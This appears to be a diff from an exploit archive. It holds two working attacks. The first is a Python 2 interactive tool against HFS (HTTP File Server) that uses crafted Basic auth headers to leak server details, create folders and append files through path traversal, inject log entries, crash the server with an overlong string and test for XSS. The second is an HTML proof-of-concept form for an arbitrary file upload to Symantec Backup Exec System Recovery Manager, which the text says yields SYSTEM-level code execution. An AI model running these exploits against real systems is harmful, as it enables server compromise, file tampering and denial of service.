 msg_done = 'Done.\n'
 msg_acc_file = 'Error reading local file (file not found):'
 msg_help = 'Type "help" to view a list of commands.'
 msg_err_con = 'Error Connecting:'
 msg_fail = 'Failed.'
 msg_req_ok = 'Request accepted.'
 uagent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Syhunt HFSHack)';
 path = '/' # Default Path
 def dorequest(hpath,auth_data,s_msg,f_msg):
        globals()["rcvd"] = ''
        globals()["banner"] = ''
 	url = 'http://'+host+hpath
 	try:
 		opener = urllib2.build_opener(url)
 		opener.addheaders = [('User-agent', uagent)]
 		if auth_data != '':
 			opener.addheaders = [('Authorization', 'Basic '+auth_data)]
 		globals()["rcvd"] = opener.open(url).readlines()
 	        if 'server' in opener.open(url).headers:
 			globals()["banner"] = opener.open(url).headers['server']
 	except Exception, msg:
 		if f_msg != '':
 			print f_msg,msg
 		return False
 	else:
 		if s_msg != '':
 			print s_msg
 		return True
 def genbase64str(string):
 	base64str = base64.encodestring(string);
        base64str = base64str.replace("\n","")
 	return base64str
 def readlocalfile(filename):
    file = open(filename, "r")
    text = file.readlines()
    file.close()
    print text
    filecontentstr = ''
    for l in text:
 	filecontentstr = filecontentstr+l
    return filecontentstr
 def ishostavailable():
 	return dorequest(path,'','',msg_err_con)
 def getservinfo(symbol,desc):
 	base64str = base64.encodestring('<id>%'+symbol+'%</id>');
 	if dorequest(path,base64str,'',msg_err_con):
 		for l in rcvd:
 			hfsver = re.findall('<id>(.*?)</id>', l)
 			for r in hfsver:
 				if r != []:
 					hfsverdec = urllib2.unquote(hfsver[0])
 					if desc != '':
 						print desc+': '+hfsverdec
 					return hfsverdec
 	else:
 		return ''
 def getallservinf():
 	for l in symbol_list:
 		curl = l.split(';')
 		getservinfo(curl[0],curl[1])
 def hfsmkdir(dirname):
 	base64str = genbase64str('\\..\\'+dirname+'\\')+'AA';
 	dorequest(path,base64str,msg_req_ok,msg_fail)
 def shutdownhfs():
 	dosstr = genbase64str('a' * 270 + ':')
 	if dorequest(path,dosstr,msg_fail,'DoS executed.'):
        	dorequest(path,'','Host is still up.','Host is now down.')
 def hfsappendtofile(filename,string):
 	base64str = genbase64str('\\..\\'+filename)+'AA';
 	dorequest('/?%0a'+string,base64str,msg_req_ok,msg_fail)
 def hfsinjecttolog(string):
 	base64str = genbase64str(string);
 	dorequest('/',base64str,msg_req_ok,msg_fail)
 def procparams(cmd):
 	try:
 		if len(cmd) > 0:
 			if cmd[1] != []:
 				globals()["host"] = cmd[1]
 	except:
 		print "No target info provided. Using localhost"
 def checkxss():
 	if ishostavailable():
 		curver = getservinfo('version','')
 		if curver != '':
 			return 'XSS Found'
 		else:
 			return 'Not Vulnerable'
 	else:
 		return msg_fail
 def isbanner(regex):
 	p = re.compile(regex)
 	m = p.match(banner)
 	return m
 def showacceptedcmds():
 	cmds = 'None (This server is not vulnerable)';
 	if isbanner(re_200801161):
 		cmds = 'checkxss symbols ver'
 	if isbanner(re_200801162):
 		cmds = cmds+' manipf mkd checkdos'
 	if isbanner(re_200801163):
 		cmds = cmds+' maniplog'
 	print '\nAvailable commands for this server:'
 	print ' '+cmds+'\n'
 def showver():
 	cangetver = True
 	if banner != '':
 		server_name = banner.split()
 		print banner
 		if server_name[0] != 'HFS':
 			print 'Not running HFS!'
 			cangetver = False
 		else:
 			if isbanner(re_cangetver):
 				print 'Confirming version...'
 			else:
 				cangetver = False
 	else:
 		print 'No version information found.'
 		print 'The "Send HFS identifier" option is probably disabled.'
 		print 'Trying to force HFS to display its version...'
 	if cangetver == True:
 		idver = getservinfo('version','HFS version number')
 		idbuild = getservinfo('build','HFS build number')
 		globals()["banner"] = 'HFS '+idver+' '+idbuild
 	showacceptedcmds()
 def result(s):
 	cmd = s.split()
 	if len(cmd) > 0:
 		curcmd = cmd[0]
 		result = 'Invalid command. Type "help" for list of commands.'
 		if curcmd == 'open':
 			procparams(cmd)
 			if ishostavailable():
 				showver()
 				result = 'Connected.\n'
 			else:
 				result = msg_fail
 		elif curcmd == 'symbols':
 			if ishostavailable():
 				showver()
 				print 'Forcing HFS to reveal more details...'
 				getallservinf()
 			result = msg_done
 		elif curcmd == 'ver':
 			if ishostavailable():
 				showver()
 			result = msg_done
 		elif curcmd == 'mkd':
 			if len(cmd) > 1:
 				if cmd[1] != []:
 					hfsmkdir(cmd[1])
 				result = msg_done
 			else:
 				result = msg_par_mis
 		elif curcmd == 'manipf':
 			if len(cmd) > 2:
 				try:
 					localfilecontent = readlocalfile(cmd[1])
 				except Exception, msg:
 					result = msg_acc_file,msg
 				else:
        				localfilecontent = localfilecontent.replace("\n","%0a")
 					hfsappendtofile(cmd[2],localfilecontent)
 					result = msg_done
 			else:
 				result = msg_par_mis
 		elif curcmd == 'maniplog':
 			if len(cmd) > 1:
 				try:
 					localfilecontent = readlocalfile(cmd[1])
 				except Exception, msg:
 					result = msg_acc_file,msg
 				else:
 					hfsinjecttolog(localfilecontent)
 					result = msg_done
 			else:
 				result = msg_par_mis
 		elif curcmd == 'checkdos':
 			shutdownhfs()
 			result = msg_done
 		elif curcmd == 'checkxss':
 			result = checkxss()
 		elif curcmd == 'help':
 			result = help
 		elif curcmd == 'readme':
 			result = readme
 		elif curcmd == 'quit':
 			result = 'Bye!'
 		return result
 	else:
 		return msg_help
 print about
 s = ""
 while s != "quit":
 	try: s = raw_input(">")
 	except EOFError:
 		s = "quit"
 		print s
 	print result(s)
--- a/platforms/windows/remote/31072.html
+++ b/platforms/windows/remote/31072.html
@ -0,0 +1,23 @@
 source: http://www.securityfocus.com/bid/27487/info
 Symantec Backup Exec System Recovery Manager is prone to a vulnerability that allows arbitrary unauthorized files to be uploaded to any location on the affected server.
 This issue resides in the Symantec LiveState Apache Tomcat server. Attackers can leverage it to execute arbitrary code with SYSTEM-level privileges and completely compromise affected computers. 
 <?xml version="1.0"?>
 <html xmlns="http://www.w3.org/1999/xhtml">
  <head><title>File Upload POC</title></head>
  <body>
    <h2> Backup Exec System Recovery Manager 7.0<br>File Upload POC</h2>
    <form action="https://www.example.com:8443/axis/FileUpload" method="post"
 enctype="multipart/form-data">
      Remote Path: <input name="path" size="100" type="text"
 value="C:\Program Files\Symantec\Backup Exec System
 Recovery\Manager\Services\tomcat\WebApps\axis"/><br/>
 	File to upload: <input name="log_file" type="file"/><br/>
      <hr/>
      <p><input type="submit"/><input type="reset"/></p>
 	  </form>
 (c)BastardLabs 2008.
  </body>
 </html>